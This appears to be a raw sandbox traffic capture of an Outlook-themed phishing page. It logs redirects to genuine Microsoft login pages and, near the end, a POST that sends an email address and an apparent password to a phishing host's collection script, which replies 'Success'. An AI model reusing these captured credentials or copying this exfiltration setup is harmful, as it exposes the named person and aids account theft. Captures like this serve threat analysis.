2025-04-02 13:02:27 UTC	1131	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 13:02:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.33 Set-Cookie: PHPSESSID=0lca8re2vg7v4lnq07g1gco8qf; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9BFQbyfUWNAHqJFH80eRQV8%2BcXB3qr6SZsP3TkVqzSCBcMqdPg7V0lcSeb7Q2hzJ48jweDBo7f3hzjPyLaQKbjaSAy4MT%2FMtyfu05ANl%2FQQDRc8uI%2FGVXvONFdNM4Ryl01GI1XCBaTreV%2B%2BOEw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92a0854cb952421f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=103097&min_rtt=103010&rtt_var=21813&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1387&delivery_rate=36166&cwnd=224&unsent_bytes=0&cid=543d7dc6c1cb2b25&ts=553&x=0"
2025-04-02 13:02:27 UTC	25	IN	Data Raw: 31 33 0d 0a 49 6e 76 61 6c 69 64 20 63 72 65 64 65 6e 74 69 61 6c 73 0d 0a Data Ascii: 13Invalid credentials
2025-04-02 13:02:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:02:27 UTC	449	OUT	GET /app/godag.php HTTP/1.1 Host: erfectries.jamesolflt.bond Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=2ku3e3aufn4jfmga3rcg7k98ut
2025-04-02 13:02:28 UTC	547	IN	HTTP/1.1 302 Found Date: Wed, 02 Apr 2025 13:02:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Server: cloudflare X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type Location: https://outlook.office.com Cf-Cache-Status: DYNAMIC CF-RAY: 92a085519bb51906-EWR alt-svc: h3=":443"; ma=86400
2025-04-02 13:02:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:02:28 UTC	382	OUT	GET / HTTP/1.1 Host: outlook.office.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:02:28 UTC	641	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://outlook.office.com/owa/ Server: Microsoft-IIS/10.0 request-id: 7df12099-0827-9e35-d24a-c3e816bd3107 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: BL6PEPF00013E08 X-RequestId: 5de42ad4-445c-4026-b59c-2a1ba4c44040 Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-FEProxyInfo: BL6PEPF00013E08.NAMP222.PROD.OUTLOOK.COM X-FEEFZInfo: MNZ MS-CV: mSDxfScINZ7SSsPoFr0xBw.0 X-Powered-By: ASP.NET X-FEServer: BL6PEPF00013E08 Date: Wed, 02 Apr 2025 13:02:28 GMT Connection: close Content-Length: 0

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:02:29 UTC	386	OUT	GET /owa/ HTTP/1.1 Host: outlook.office.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:02:29 UTC	10962	IN	HTTP/1.1 302 Content-Length: 783 Content-Type: text/html; charset=utf-8 Location: https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https%3a%2f%2foutlook.office.com%2fowa%2f&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code+id_token&scope=openid&msafed=1&msaredir=1&client-request-id=fed3d36f-8ae3-3d09-5d7f-9db3a93563a1&protectedtoken=true&claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d&nonce=638791957494166796.0183df0d-d0c0-4d9a-8337-34682ca3f5bb&state=Dcs7EoAgDABR0PE4kWBCPscBMrSWXl-Kt93mlNK5HVvGnaRCpl69KTtXEXW5sRrFwoDAicDhHYxIgVjsmZ1WGyPv9yrv18sP request-id: fed3d36f-8ae3-3d09-5d7f-9db3a93563a1 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-CalculatedFETarget: CH2PR12CU001.internal.outlook.com X-BackEndHttpStatus: 302 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ClientId=27FB4385CA36452B9A7FC392D401AE00; expires=Thu, 02-Apr-2026 13:02:29 GMT; path=/;SameSite=None; secure Set-Cookie: ClientId=27FB4385CA36452B9A7FC392D401AE00; expires=Thu, 02-Apr-2026 13:02:29 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Thu, 02-Oct-2025 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: RoutingKeyCookie=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v3=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v31=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v32=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v33=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v34=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v35=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v36=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v3=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v31=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v32=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v33=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v34=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v35=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v36=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.nonce.v3.Fo5fe8qPZLlBcpr6yzTV4PTHUGymm-3HmcLotv1Le08=638791957494166796.0183df0d-d0c0-4d9a-8337-34682ca3f5bb; expires=Wed, 02-Apr-2025 14:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OptInPrg=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: SuiteServiceProxyKey=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: ClientId=27FB4385CA36452B9A7FC392D401AE00; expires=Thu, 02-Apr-2026 13:02:29 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Thu, 02-Oct-2025 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: RoutingKeyCookie=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v3=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v31=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v32=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v33=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v34=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v35=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v36=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v3=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v31=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v32=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v33=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v34=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v35=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v36=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; domain=outlook.office.com; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.nonce.v3.Fo5fe8qPZLlBcpr6yzTV4PTHUGymm-3HmcLotv1Le08=638791957494166796.0183df0d-d0c0-4d9a-8337-34682ca3f5bb; expires=Wed, 02-Apr-2025 14:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OptInPrg=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: SuiteServiceProxyKey=; expires=Sun, 02-Apr-1995 13:02:29 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: X-OWA-RedirectHistory=ArLym14BDPXQn-Zx3Qg; expires=Wed, 02-Apr-2025 19:04:29 GMT; path=/;SameSite=None; secure; HttpOnly X-CalculatedBETarget: CH3P222MB1259.NAMP222.PROD.OUTLOOK.COM X-BackEndHttpStatus: 302 X-RUM-Validated: 1 X-RUM-NotUpdateQueriedPath: 1 X-RUM-NotUpdateQueriedDbCopy: 1 X-Content-Type-Options: nosniff X-BeSku: WCS8 X-OWA-DiagnosticsInfo: 2;0;0; X-BackEnd-Begin: 2025-04-02T13:02:29.416 X-BackEnd-End: 2025-04-02T13:02:29.416 X-UA-Compatible: IE=EmulateIE7 X-ResponseOrigin: OwaAppPool X-Proxy-RoutingCorrectness: 1 X-Proxy-BackendServerStatus: 302 X-FEEFZInfo: MNZ X-FEServer: CH2PR12CA0010 Report-To: {"group":"NelOfficeUpload1","max_age":7200,"endpoints":[{"url":"https://exo.nel.measure.office.net/api/report?TenantId=&FrontEnd=Cafe&DesusertionEndpoint=MNZ&RemoteIP=161.77.13.0&Environment=MT"}],"include_subdomains":true} NEL: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01} Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-FirstHopCafeEFZ: MNZ X-FEProxyInfo: BL6PEPF00013E05.NAMP222.PROD.OUTLOOK.COM X-FEServer: BL6PEPF00013E05 Date: Wed, 02 Apr 2025 13:02:28 GMT Connection: close
2025-04-02 13:02:29 UTC	783	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 2f 63 6f 6d 6d 6f 6e 2f 6f 61 75 74 68 32 2f 61 75 74 68 6f 72 69 7a 65 3f 63 6c 69 65 6e 74 5f 69 64 3d 30 30 30 30 30 30 30 32 2d 30 30 30 30 2d 30 66 66 31 2d 63 65 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 26 61 6d 70 3b 72 65 64 69 72 65 63 74 5f 75 72 69 3d 68 74 74 70 73 25 33 61 25 32 66 25 32 66 6f 75 74 6c 6f 6f 6b 2e 6f 66 66 69 63 65 2e 63 6f 6d 25 32 66 6f 77 61 25 32 66 26 61 6d 70 3b 72 65 73 6f Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://login.microsoftonline.com/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https%3a%2f%2foutlook.office.com%2fowa%2f&reso

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:02:29 UTC	973	OUT	GET /common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000&redirect_uri=https%3a%2f%2foutlook.office.com%2fowa%2f&resource=00000002-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code+id_token&scope=openid&msafed=1&msaredir=1&client-request-id=fed3d36f-8ae3-3d09-5d7f-9db3a93563a1&protectedtoken=true&claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d&nonce=638791957494166796.0183df0d-d0c0-4d9a-8337-34682ca3f5bb&state=Dcs7EoAgDABR0PE4kWBCPscBMrSWXl-Kt93mlNK5HVvGnaRCpl69KTtXEXW5sRrFwoDAicDhHYxIgVjsmZ1WGyPv9yrv18sP HTTP/1.1 Host: login.microsoftonline.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:02:30 UTC	2208	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: 5599a12d-3b80-4875-afe4-35bc33273200 x-ms-ests-server: 2.1.20393.4 - WUS3 ProdSlices report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]} nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-bl3goo3NgiJj-fVVqZmdfw' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All X-XSS-Protection: 0 Set-Cookie: esctx-dt5LRe273s=AQABCQEAAABVrSpeuWamRam2jAF1XRQE2TFdUImkqnTAivGT2jfBpxSxY0bX279kJaKwlYEcl3pMBNAPWoEY2LdYCBoNPGIkfCI-b_EiMoEwXobd7vItUPg6JQDxcuLwgOyLGg1-4IzcjUj14DjwCTv41XYZa6po7TTOmqsVzKHygiBgecyK9yAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None Set-Cookie: fpc=AvmpiPM0Mx9OsQDLzmOjENA; expires=Fri, 02-May-2025 13:02:30 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE_fRuG24Lx9tW6PMOYTfCyGE2OBltJHw6kONQs2eU9C1J6WKjDpYTcJCzHB3fljtsurc0MwP0OsLYZlNG3qyv-HGP-FA6Y4XrgDpasgEB-tjUiBTopo8D5bqWMAHWF_-JCaot0BQ9GML7yHFiXJG1SD0cO1MH64U5z8VIwEJPh1MgAA; domain=.login.microsoftonline.com; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly Date: Wed, 02 Apr 2025 13:02:30 GMT Connection: close Content-Length: 21130
2025-04-02 13:02:30 UTC	14176	IN	Data Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head> <title>Redirecting</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" conten
2025-04-02 13:02:30 UTC	6954	IN	Data Raw: 7d 73 26 26 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 65 72 72 6f 72 2e 61 73 70 78 3f 65 72 72 3d 35 30 34 22 29 7d 29 7d 2c 63 2e 4f 6e 45 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 73 72 63 7c 7c 65 2e 68 72 65 66 7c 7c 22 22 2c 6f 3d 69 28 29 2c 73 3d 61 28 29 3b 69 66 28 21 65 29 7b 74 68 72 6f 77 22 54 68 65 20 74 61 72 67 65 74 20 65 6c 65 6d 65 6e 74 20 6d 75 73 74 20 62 65 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 63 61 6e 6e 6f 74 20 62 65 20 6e 75 6c 6c 2e 22 7d 72 28 22 5b 24 4c 6f 61 64 65 72 5d 3a 20 46 61 69 6c 65 64 22 2c 65 29 3b 76 61 72 20 75 3d 6e 65 77 20 63 3b 75 2e 66 61 69 6c 4d 65 73 73 61 67 65 3d 22 52 65 6c 6f 61 64 20 46 61 69 6c 65 64 22 2c 75 2e 73 75 Data Ascii: }s&&(document.location.href="/error.aspx?err=504")})},c.OnError=function(e,t){var n=e.src\|\|e.href\|\|"",o=i(),s=a();if(!e){throw"The target element must be provided and cannot be null."}r("[$Loader]: Failed",e);var u=new c;u.failMessage="Reload Failed",u.su

Timestamp	Bytes transferred	Direction	Data
2025-04-02 13:02:36 UTC	746	OUT	POST /app/godag.php HTTP/1.1 Host: erfectries.jamesolflt.bond Connection: keep-alive Content-Length: 57 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-04-02 13:02:36 UTC	57	OUT	Data Raw: 69 73 61 64 6f 73 61 3d 70 61 75 6c 2e 6e 65 66 66 25 34 30 67 65 6e 65 78 73 65 72 76 69 63 65 73 2e 63 6f 6d 26 67 74 61 67 6f 6c 61 73 3d 65 6e 78 34 30 6c 4c 6d 4e 59 Data Ascii: isadosa=paul.neff%40genexservices.com&gtagolas=enx40lLmNY
2025-04-02 13:02:36 UTC	1129	IN	HTTP/1.1 200 OK Date: Wed, 02 Apr 2025 13:02:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.33 Set-Cookie: PHPSESSID=sai09itg9bmsrlpdg90idljbja; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F6Bed6JUECCfAb5C3UY%2FuuY3JJQBorx7QCTAIxo6pyq%2BtKB6JJT9ezNVrPosBts3SumuTbBGqqxFCbTLxvj7mmsxLtJ4d9mp61z9nQrLapnUUFEM04jklcoV4o8wkKQ%2FnH%2BuGsJQhlk0YNRE5Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92a08584eb5372aa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=101895&min_rtt=100792&rtt_var=22942&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1397&delivery_rate=35705&cwnd=249&unsent_bytes=0&cid=557b4360d0a83952&ts=733&x=0"
2025-04-02 13:02:36 UTC	12	IN	Data Raw: 37 0d 0a 53 75 63 63 65 73 73 0d 0a Data Ascii: 7Success
2025-04-02 13:02:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
